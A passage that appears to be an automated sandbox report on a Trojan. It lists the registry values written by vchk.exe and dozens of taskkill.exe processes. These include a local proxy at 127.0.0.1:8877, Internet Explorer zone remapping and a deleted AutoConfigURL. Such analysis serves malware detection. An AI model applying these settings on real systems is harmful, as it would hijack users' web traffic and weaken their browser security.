[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 B0 F4 9F 47 9C 00 B6 03 D1 17 90 EC D4 24 47"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 DF D6 EE 40 84 F1 92 1E EC 7E 2F D8 47 97 C8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB FF 15 8E D9 C8 0A 62 44 14 2D FD 63 D3 D3 4F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process taskkill.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 BF 34 40 63 39 ED B4 D8 B3 A3 4E 9E 3D 80 9A"

The process taskkill.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED F1 52 39 4E B8 F9 1E 39 4B 3F 36 EB FB F6 6A"

The process taskkill.exe:3712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 64 82 5A 43 CE 50 84 F9 06 94 CD BF 2E 2B 85"

The process taskkill.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 39 98 4A 14 68 70 5E B7 2F 62 4D BD 9D 47 E2"

The process taskkill.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 2C 91 77 80 43 5E 2D 36 FA 70 38 CB F4 87 77"

The process taskkill.exe:3288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB AD 55 B7 EC EF 2A 83 BF 51 30 8B D5 0D 04 61"

The process taskkill.exe:2968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 02 BF 02 23 4D 40 3B EE EE 68 AB 27 C7 C6 58"

The process taskkill.exe:2524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 0E B5 34 EE 0C FF 18 90 A0 2E 1A 0E 60 C3 7D"

The process taskkill.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 54 6A FB EE 2C D6 3C EB FE 3B 31 47 29 8E 43"

The process taskkill.exe:2520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F E1 07 E9 BB 2E F0 61 C0 7A 5A 4B 53 06 0D ED"

The process taskkill.exe:2324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 78 82 FF BD A4 5E 9D 35 3B D7 18 A3 DF 74 C6"

The process taskkill.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF B5 63 64 FC 80 D3 A4 B2 42 D2 89 2B 34 B0 A1"

The process taskkill.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 32 9F 11 01 32 8B 56 45 4E E9 6D AC 63 A6 55"

The process taskkill.exe:2248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 7A AD 59 AD 52 2E 05 24 4B 46 02 A1 08 38 93"

The process taskkill.exe:2400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E A3 1F 23 A4 08 70 F1 FC 3F D6 E8 6A 00 F5 89"

The process taskkill.exe:2292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 79 7D 68 DB 16 7F 49 36 3A 40 D3 9A D5 66 B9"

The process taskkill.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 45 E8 28 89 29 16 C2 3A 6C E5 1D B7 52 18 C1"

The process taskkill.exe:2844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 0A F0 94 17 E4 E5 0F 03 2F 30 2D 16 48 7E 02"

The process taskkill.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 05 B3 F2 71 36 6D CF A7 0C AE BB A0 7B 10 22"

The process taskkill.exe:3760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 84 2D 08 37 83 42 60 13 08 49 D6 4F 27 66 C9"

The process taskkill.exe:3488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 4D 76 93 5E 12 64 93 5C 78 4C 3E 4A 63 A8 01"

The process taskkill.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 B1 BD 14 A9 B9 6D 24 8A 8A BF F3 4D EF 4D F4"

The process taskkill.exe:3764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 46 DE 11 15 9B C6 7A 08 5A 8A 9A 81 59 ED"

The process taskkill.exe:2708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 11 40 78 DF AA 6C 31 4A 02 A5 7A 21 19 A9 47"

The process taskkill.exe:3832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 3B 29 9C 2B 10 9F 96 2D 88 91 14 4D A9 96 23"

The process taskkill.exe:2852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 05 9C F5 A9 2C 39 34 FB CA 73 41 91 86 3E 9A"

The process taskkill.exe:1152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 82 80 91 93 8C B3 77 82 CD 20 3F E8 77 86 F5"

The process taskkill.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D DD C0 37 54 67 5E A3 DE 00 2C 89 0B BD 21 9B"

The process taskkill.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D4 D5 68 46 3A 7A B1 98 C1 6A E8 98 EF A3 5D"

The process taskkill.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 25 89 05 04 CC E2 F0 B2 98 70 6E D8 01 C5 5E"

The process taskkill.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 75 F5 2C 19 CE 1A AC E9 F7 8D DF 48 9B 43 3E"

The process taskkill.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 4E 5C 52 5E 76 05 91 D2 4A 3C 15 C9 9D C1 F3"

The process taskkill.exe:2996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 19 45 7F 07 43 C8 96 DD 11 DF C2 6F 49 F9 BE"

The process taskkill.exe:3244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 3C 44 E5 0A EF 96 F5 7F 11 CE E7 1A D9 11 9A"

The process taskkill.exe:4080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C C5 D1 B9 2A 2E 4F 75 76 42 2C 47 01 0B 21 FA"

The process taskkill.exe:2412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 0E 4F 51 FA BB 77 D0 64 81 44 D6 2A 67 5E 0B"

The process taskkill.exe:3844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA B7 74 8C 99 CA 12 6C 1F A2 F7 9C 6A 5C 95 62"

The process taskkill.exe:412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 15 4E 58 67 AF AC 66 35 04 F0 40 3F DA 03 16"

The process taskkill.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 3B 0B A1 80 2A 7C 1A AB 63 3B 75 CF 32 C0 4E"

The process taskkill.exe:2148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 EC 1D 0A 28 ED 4B 7E 22 10 E2 C0 F8 3C 85 ED"

The process taskkill.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 9C B9 C3 F6 FC 1E B4 81 5B 1F AB 67 50 24 11"

The process taskkill.exe:2476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 A6 15 15 C8 1C C7 ED D5 D7 1C 1B A1 88 A4 20"

The process taskkill.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 8D BF 7E D1 96 5A 2D 3A 55 9A CC DC CD 8C DD"

The process taskkill.exe:3820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 45 35 20 B5 88 93 90 4F 03 96 85 D1 73 87 D8"

The process taskkill.exe:3276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 53 49 FA 25 68 84 6C C9 0E DA 48 60 E3 67 F7"

The process taskkill.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 82 EB 5A CC B3 34 AF 96 15 51 E1 CF 5D A8 5C"

The process taskkill.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF D3 AB D4 43 10 B2 45 D5 05 C2 A5 A8 D6 46 CF"

The process taskkill.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 0C 0E D7 7C DB 5D FE 12 B4 C3 2C 29 44 2A D9"

The process taskkill.exe:3208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D EB 38 BE 93 F5 0B 91 15 AF 76 D8 28 AF 24 F6"

The process taskkill.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E D4 F9 90 6D 9D A4 81 24 71 4B F2 A0 87 8F 9F"

The process taskkill.exe:4044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 DF CF 55 6D 8F AC B8 6A 7B D7 F9 8B D1 B6 F9"

The process taskkill.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 B7 4F 8D D8 EB 6C 3E 96 1A 3B 49 EF 7B B2 AB"

The process taskkill.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 FF DA DB 19 1F DB CD 3B FC B5 64 43 88 B9 0B"

The process taskkill.exe:2780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 B2 35 F1 AD 32 D5 8F E2 71 C0 06 AC B8 14 D9"

The process taskkill.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 83 24 81 0D C5 43 0E C6 EA 8F F3 AC 40 B4 6B"

The process taskkill.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 95 D8 EE AB 71 F6 CF A7 70 3D E2 B9 97 DF 7F"

The process taskkill.exe:3388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 DE 8B E9 31 62 59 5D 0C 08 8E 33 9F FC 26 AD"

The process taskkill.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 DB 97 45 37 54 F8 F2 84 6C 5B 9B 15 F2 77 2D"

The process taskkill.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 34 A8 70 DE 6D 25 D7 82 1C E9 F0 64 49 ED 5F"

The process taskkill.exe:2664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 8F C9 0D DE DF 82 02 F6 03 AD 6C 0E B6 66 9B"

The process taskkill.exe:2660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 9E 24 5B 03 7F B4 F1 4D D2 7C 16 2C 8D 6F 5D"

The process taskkill.exe:1652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 57 3C 59 D6 AB 8D E3 42 D9 A6 C2 48 B1 FE 0E"

The process taskkill.exe:2260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 9C 3F DF 8F 26 46 8A 80 28 03 FC D5 7A 17 AF"

The process taskkill.exe:3744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 EF BA 19 E2 3E 42 A7 65 15 E1 07 0B 1E 3E 0E"

The process taskkill.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 6F FE 7B E4 D1 DF AC 46 A6 EB BC 22 10 22 A4"

The process taskkill.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 12 B3 12 8E C6 35 C9 88 69 93 DF 64 4B 40 C8"

The process taskkill.exe:3556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 25 72 64 D0 AB CE 75 23 57 9D 6F 96 A5 0C 93"

The process taskkill.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 87 78 79 5F 1D 56 C6 0C A2 E3 7C 11 8F 15 0B"

The process taskkill.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 66 46 5C 56 77 84 4B 56 0E 84 73 A0 27 62 37"

The process taskkill.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 49 14 C3 A5 D7 6B 03 07 11 6F 34 11 42 7B 8B"

The process taskkill.exe:3508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 8F C1 D9 CF 60 88 C3 BD D6 0A 97 51 91 16 A6"

The process taskkill.exe:4056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 C6 28 50 B7 1E C1 44 75 3E 4A CE D4 FE 6C 8B"

The process taskkill.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 08 03 73 4E 4B 7E 36 DA A7 D0 CC 1C E9 FB AD"

The process taskkill.exe:2576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D F8 89 DA 1F 97 A0 3A 5E 11 47 8A F2 29 4A F7"

The process taskkill.exe:3468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 39 9F 42 B2 31 73 93 7F 2C 90 CF 21 8F C7 9E"

The process taskkill.exe:2376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D B4 86 A4 9D BB AA 9A F8 18 BE C0 E5 33 96 33"

The process taskkill.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 1D 06 52 4E 15 00 41 84 B1 ED 0F 8B EC 76 1A"

The process taskkill.exe:2484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 12 46 77 64 87 89 B2 80 47 9B 15 8E 01 06 0A"

The process taskkill.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 19 14 B0 BD 90 AF 05 28 9B 18 5C CB FC D8 3D"

The process taskkill.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 8B 95 F1 8B 4B 6C E7 F5 A9 DB A9 09 A1 65 A8"

The process taskkill.exe:2920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 2A 61 84 CD 87 CA 5C B9 AF 2B D8 AA 57 E1 06"

The process taskkill.exe:336 makes changes in the system registry.
